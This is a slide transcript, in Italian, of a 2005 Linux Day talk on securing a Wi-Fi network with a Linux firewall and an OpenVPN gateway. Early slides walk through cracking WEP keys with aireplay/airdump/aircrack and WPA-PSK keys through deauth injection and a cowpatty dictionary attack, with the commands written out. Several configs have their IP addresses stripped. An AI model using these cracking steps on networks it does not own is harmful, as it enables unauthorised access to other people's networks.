Di Giuseppe `Lan` Marocchio

Transcript

1 Linux Day 2005 SECURE WLAN GATEWAY Di Giuseppe `Lan` Marocchio

2 Indice: 1 Introduzione *Strumenti *Wifi Features *Wep, Wpa *Cracking the Wlan 2 Inizio Lavori *Infrastruttura *Linux box *Openvpn *Configurazione dei client (Win/Linux) *Tuning del sistema 3 Chiusura lavori *Troubleshooting *Domande & Risposte

3 Introduzione Quali Apparati abbiamo a disposizione per costruire una rete Wifi? -Access Points -Adattatori a/b/g -Bridge -Repeater

4 Introduzione Note Tecniche Cosa caratterizza propriamente una rete Wifi? -Identificativo di rete SSID -Modalità di funzionamento: Ad hoc o Managed -Utilizzo di Crittografia (è buona norma) Un apparecchio Wifi trasmette su frequenze di 2.4Ghz con la potenza massima consentita dalla legge italiana di 100mW, sono inoltre disponibili 11 canali (13) per l'utilizzo contemporaneo di più access points nella stessa Area.

5 Introduzione - WEP Il Wired Equivalent Privacy (WEP) è parte dello standard IEE (ratificato nel 1999 ) è stato progettato per fornire una sicurezza comparabile a quelle delle normali LAN basate su cavo. Purtroppo seri difetti sono stati scoperti nella particolare implementazione dell'algoritmo crittografico utilizzato per rendere sicure le comunicazioni. Questo ha reso necessario una revisione del WEP che adesso viene considerato un sottoinsieme del più sicuro standard WPA. Il WEP viene ritenuto il minimo indispensabile per impedire a un utente casuale di accedere alla rete locale. Dettagli WEP usa l'algoritmo di cifratura stream RC4 per la sicurezza e utilizza il CRC-32 per verificare l'integrità dei dati. Nello specifico l'rc4 del WEP utilizza due chiavi, a 40 bit e a 104 bit. A queste vengono aggiunti 24 bit per inizializzare il vettore quando viene trasmesso in chiaro.

6 Introduzione - WEP Difetti Cam Winget e altri (2003) segnalarono che il WEP aveva una serie di debolezze. In particolari due erano molto gravi: La prima era che l'utilizzo del WEP era opzionale e quindi moltissimi utilizzatori non lo attivavano esponendo la propria rete locale a qualsiasi utente dotato di una scheda di rete senza fili. La seconda debolezza era legata al fatto che il protocollo non includeva una gestione delle chiavi utilizzate per la codifica dei messaggi. Questo, insieme alla constatazione che le chiavi utilizzabili per cifrare i messaggi erano poche, esponeva il WEP a molte tipologie di attacchi. E` quindi possibile analizzando il traffico di ua WLAN ottenere in breve tempo (poche ore) la chiave utilizzata per cifrare la rete locale.

7 Introduzione - WPA Wi-Fi Protected Access (WPA) è un protocollo per la sicurezza delle reti Wi-Fi creato per tamponare i problemi del WEP. Il WPA implementa parte del protocollo IEE802.11i e rappresenta un passaggio intermedio per il raggiungimento della piena sicurezza. WPA è progettato per utilizzare lo standard IEE802.1x per gestire l'autentificazione delle macchine e la distribuzione di differenti chiavi per ogni utente, tuttavia per questioni di compatibilità supporta la precedente gestione a chiave condivisa (PSK). I dati sono cifrati col l'algoritmo a blocchi RC4 con chiave a 128 bit e vettore di inizializzazione a 48 bit. Una delle modifiche che introducono maggiore robustezza all'algoritmo è l'inserimento del Temporal Key Integrity Protocol (TKIP). Questo protocollo dinamicamente cambia la chiave in uso. Questo combinato con il V.I. di dimensione doppia rende inefficaci e metodi di attacco utilizzati contro il WEP.

8 Introduzione - WPA In sostanza il WPA aumenta la dimensione della chiave, il numero delle chiavi in uso, include un sistema per verificare l'autenticità dei messaggi migliore e quindi incrementa la sicurezza della WLAN rendendola effettivamente analoga a quella di una rete su cavo. La Wi-Fi Alliance (gruppo che gestisce lo standard Wi Fi) ha dichiarato che utilizzerà il termine WPA2 per identificare i dispositivi che avranno il pieno supporto dello standard IEE802.11i. Wi-Fi Alliance ha introdotto i termini WPA-Personal e WPAEnterprise per differenziare due classi di prodotti. i WPAPersonal utilizzeranno il metodo PSK a chiave condivisa mentre i WPA-Enterprise utilizzeranno un server di autentificazione (RADIUS). Questo per differenziare le due classi di sicurezza.

9 Introduzione Cracking WEP (0) Strumenti a disposizione: -Laptop con Linux -Scheda Wifi compatibile (nel nostro caso una Prism 54g riconosciuta come ethx ) -Una Rete Criptata -Un po ti Tempo a Disposizione. (2 ore in linea di massima) Scenario: Abbiamo trovato una rete protetta, abbiamo l'identificativo (BSSID) e il mac address dell'access point e di una macchina nella lan con il nostro sniffer preferito (Kismet). Azione: -Iniziamo con attivare un replicatore di pacchetti in questo modo possiamo velocizzare il Cracking della chiave. Attiviamo aireplay.sh (il nostro replicatore ) #./start-aireplay.sh

10 Introduzione Cracking WEP (1) -Ora mettiamo la Nostra scheda Wifi in monitor mode e sul canale dell'ap #iwconfig eth0 mode monitor #iwconfig eth0 channel <NUMEROCANALE> -Bene è il momento di iniziare a catturare Pacchetti Usando Airdump: #airdump eth0 pac.arch <MACDELLAP> -Per velocizzare ulteriormente il cracking della chiave dobbiamo generare altro traffico spazzatura: (ping e aireplay fanno al caso nostro) #ping -t -l ADDR_MAC_DI_UN_CLIENT #aireplay -x 512 eth0

11 Introduzione -Cracking WEP (2) -Bene dopo aver sniffatto abbastanza pacchetti (IV) è il momento di trovare la chiave wep! #aircrack -n 64 pac.arc -Pacchetti IVs richiesti per craccare il WEP 64 bit key = 25,000 a 100,000 IVs 128 bit key = 150,000 a 700,000 IVs La velocità di aircrack dipende molto dalla cpu, ci può impiegare anche più di mezzora per decriptare una chiave anche semplice. ma ricordate più pacchetti si hanno, meno tempo ci impiegherà.

12 Introduzione -Cracking WPA Scenario: Abbiamo trovato una rete protetta, abbiamo l'identificativo (BSSID) e il mac address dell'access point e di una macchina nella lan con il nostro sniffer preferito (Kismet). #airforge <mac_ap> <mac_client> deauth.cap #aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth.cap eth0 Usiamo Ethereal per catturare un po di traffico, Filtriamo secondo EAPOL e salviamo in risultato in un file fermiamo pure air replay. Ora che abbiamo in traffico EAPOL usiamo cowpatty per estrarre la PSK della WLAN #cowpatty -f Dictonary.txt -r wpa -s target -v The PSK is " ".

13 Inizio lavori Come possiamo aumentare la sicurezza dei nostri dati? -Tunnel Vpn -Policy di utilizzo restrittive -ACL sui mac delle schede -Disposizione degli ap in maniera intelligente -Timer sull'accensione e lo spegnimento degli Access Points

14 . Tunnel Vpn Esistono vari applicativi che implementano una Vpn Multi punto. La mia scelta è stata di utilizzare OpenVpn, un prodotto OpenSource ( ) relativamente semplice, Ben programmato e adattabile ai più svariati utilizzi. Disponibile per: Linux, Windows 2000/XP, OpenBSD, FreeBSD, NetBSD, Mac OS X, e Solaris. OpenVpn può funzionare in modalità client o server. È un prodotto mantenuto regolarmente e che vanta una buona diffusione anche nei confronti di (Open/Free Swan). OpenVpn Richiede l'utilizzo dei driver Tun/tap che sono presenti nel kernel linux (spesso sotto forma di modulo) e sotto windows come eseguibile. Questi driver provvederanno a creare l'interfaccia tap0, in linux, e tun in windows.

15 Infrastruttura La Rete: Router-firewall(eth0) /24 [lan su rame]-firewall(eth1) /24 [lan su wifi]-firewall(eth2) /24 [vpn]-firewall(tap0) /24

16 Configurazione Linux Box È possibile utilizzare qualsiasi Distribuzione Linux (kernel 2.4 o 2.6), la macchina in questione deve possedere almeno 3 NIC. Nell'implementazione reale è stata usata la distribuzione Gentoo con kernel 2.6, gli applicativi installati sono: -syslog-ng (Logging) -iptables (Filtering) -openvpn -nmap (può essere utile) -vim (senza questo non si inizia nemmeno) -sshd (Shell Remota) -bind (DNS) La macchina utilizzata è un p2 400mhz con 256mb di ram: fegato ~ # lspci 0000:00:00.0 Host bridge: Intel Corp. 440BX/ZX/DX BX/ZX/DX Host bridge (rev 03) 0000:00:01.0 PCI bridge: Intel Corp. 440BX/ZX/DX BX/ZX/DX AGP bridge (rev 03) 0000:00:0d.0 Ethernet controller: Intel Corp /8/9 [Ethernet Pro 100] (rev 08) 0000:00:0f.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 64) 0000:00:0e.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 64) 0000:00:14.0 ISA bridge: Intel Corp AB/EB/MB PIIX4 ISA (rev 02) 0000:00:14.1 IDE interface: Intel Corp AB/EB/MB PIIX4 IDE (rev 01) 0000:00:14.2 USB Controller: Intel Corp AB/EB/MB PIIX4 USB (rev 01) 0000:00:14.3 Bridge: Intel Corp AB/EB/MB PIIX4 ACPI (rev 02) 0000:01:00.0 VGA compatible controller: ATI Technologies Inc 3D Rage Pro AGP 1X/2X (rev 5c)

17 Configurazione Linux box Firewall Script: #!/bin/bash CLASS_LAN= /24 CLASS_WAN= /24 CLASS_VPN= /24 CLASS_WLAN= /24 LAN_IF=eth1 WAN_IF=eth0 VPN_IF=tap0 WLAN_IF=eth2 ################################### /etc/init.d/iptables stop #POLICY DI FIREWALLING iptables -P INPUT DROP iptables -P FORWARD DROP iptables -P OUTPUT ACCEPT ################################## #abilito la lan a uscire sul gw iptables -A FORWARD -s $CLASS_LAN -j ACCEPT iptables -A FORWARD -d $CLASS_LAN -m state --state ESTABLISHED,RELATED -j ACCEPT #abilito gli host della VPN a uscire su internet iptables -A FORWARD -s $CLASS_VPN -j ACCEPT iptables -A FORWARD -d $CLASS_VPN -m state --state ESTABLISHED,RELATED -j ACCEPT

18 Configurazione Linux box #abilito gli host della VPN e della LAN a comunicare tra loro iptabes -A FORWARD -s $CLASS_LAN -d $CLASS_VPN -j ACCEPT iptabes -A FORWARD -s $CLASS_VPN -d $CLASS_LAN -j ACCEPT #TRAFFICO DELLA MACCHINA Firewall iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A INPUT -p tcp --dport s $CLASS_WLAN -j ACCEPT iptables -A INPUT -p udp --dport s $CLASS_WLAN -j ACCEPT iptables -A INPUT -s $CLASS_WLAN -j DROP iptables -A INPUT -p tcp --dport 22 -j ACCEPT iptables -A INPUT -p tcp --dport 53 -j ACCEPT iptables -A INPUT -p udp --dport 53 -j ACCEPT #Logginig iptables -A INPUT -j LOG --log-prefix="input:" iptables -A OUTPUT -j LOG --log-prefix="output:" iptables -A FORWARD -j LOG --log-prefix="forward:" iptables -A FORWARD -s $CLASS_WLAN -p tcp --dport j LOG --logprefix="ac-wlan:" #abilito il forwarding degli ip echo "1" > /proc/sys/net/ipv4/ip_forward route add default gw #end of script /etc/init.d/iptables save /etc/init.d/iptables start

19 Angioletta 0wnz U

20 Configurazione Linux Box Dns server: (BIND) /etc/bind/named.conf options { directory "/var/bind"; statistics-file "/var/run/named.stat"; listen-on { /24; /24; ; }; allow-query { /24; /24; ; }; pid-file "/var/run/named/named.pid"; }; zone "." IN { type hint; file "named.ca"; }; zone "127.in-addr.arpa" IN { type master; file "pri/127.zone"; allow-update { none; }; allow-transfer { none; }; notify no; }; zone "network.local" { // Il dominio per cui il tuo server è autoritativo type master; file "pri/network.local"; // Path del file di zona relativo a /var/bind allow-transfer { ; }; //Addio AXFR :) };

21 Configurazione Linux Box DHCP server: ddns-update-style none; subnet netmask { pool { range dynamic-bootp ; } option domain-name-servers ; option routers ; authoritative; allow bootp; #hosts a cui il dhcp darà l'ip specificato host FileServer { hardware ethernet 00:0C:6E:10:26:36; fixed-address ; } } cat /etc/conf.d/dhcp IFACE="eth1" DHCPD_OPTS="-q"

22 Configurazione OpenVpn (1) Ora andiamo a rifinire la configurazione del server, configurando appositamente OpenVpn in modalità server per gestire l'autenticazione degli utenti alla Rete. OpenVpn si incaricherà il compito di dare un indirizzo ip (della classe privata riservata agli host autenticati), un server Dns (la nostra linux box), e un gateway funzionante (il nostro router) All'interfaccia tun/tap del Client

23 Configurazione OpenVpn (2) Generiamo i certificati che serviranno ad OpenVpn intestino ~ #openvpn --genkey --secret ta.key #Aggiustate i parametri secondo preferenza intestino ~ #cd /root/easy-rsa intestino ~ #./clean-all intestino ~ #./build-dh # Generiamo dh2048.pem intestino ~ #cp /root/easy-rsa/dh2048.pem /etc/openvpn/intestino/ intestino ~ #./clean-all intestino ~ #./build-req gateway intestino ~ #cp /root/easy-rsa/gateway.key /etc/openvpn/intestino/ #per finire verifichiamo il tutto: intestino PWD #openssl verify -CAfile ca.crt -purpose sslserver gateway.crt #OpenVpn config File: Port 1194 dev tap tls-server cd ca /etc/openvpn/intestino/ca.crt cert /etc/openvpn/intestino/gateway.crt key /etc/openvpn/intestino/gateway.key dh /etc/openvpn/intestino/dh2048.pem tls-auth /etc/openvpn/intestino/ta.key 0 mode server duplicate-cn ifconfig # ip firewall

24 Configurazione OpenVpn (3) Ifconfig-pool # ip range dei client push "dhcp-option DNS " #indico il dns da usare push "dhcp-option DNS " #indico il dns (secondario) da usare push "route-gateway " # default gateway mtu-test tun-mtu 1500 tun-mtu-extra 32 mssfix 1450 ping 10 ping-restart 120 push "ping 10" push "ping-restart 60" comp-lzo status /etc/openvpn/intestino/openvpn-status.log verb 4 Abbiamo finito il Server!!! #/etc/init.d/openvpn start #rc-update -a openvpn default

25 Configurazione OpenVpn (4) Configurazione Client Windows: Install: openvpn-2.0-install.exe ################################# port 1194 dev tap remote tls-client ca ca.crt cert client.crt key client-key.txt tls-auth ta-key.txt 1 mtu-test tun-mtu 1500 tun-mtu-extra 32 mssfix 1450 pull comp-lzo verb 4 ################################# (Documenti\client.ovpn)

26 Configurazione OpenVpn (5) Configurazione Client Linux: ########################### port 1194 dev tap remote tls-client ca /etc/openvpn/client/ca.crt cert/etc/openvpn/client/client.crt key /etc/openvpn/client/client.key tls-auth ta.key 1 mtu-test tun-mtu 1500 tun-mtu-extra 32 mssfix 1450 pull comp-lzo verb 4 ################################# Verifichiamo il Certificato e Attiviamo il tunnel: openssl verify -CAfile ca.crt -purpose sslclient client.crt /etc/init.d/openvpn start

27 Configurazione - tuning Ora non ci resta che provare il tutto apportando modifiche ove necessario, è utile provare il sistema in situazioni di stress come Traffico, di tentativi multipli di autenticazione al sistema (DoS), cracking della chiave WEP/WPA, utilizzi maliziosi in genere. Insomma tutte le Azioni possibili che vi vengono in mente! Altra cosa utile è il monitoring via snmp per la generazione di grafici (cacti) relativi al traffico delle interfacce, Carico del sistema, utilizzo memoria. Sono tutti strumenti UTILI per un buona gestione.

28 Chiusura Lavori Bibliografia: -forums.gentoo.org Si ringraziano: -Gli amici di AzzurraNet -Gli amici di verona.linux.it -I compagni della Metro Olografix Le slide saranno disponibili a breve su ww.lanweb.org

29 Chiusura lavori Domande... (Se c'è tempo)

30 Chiusura Lavori EOF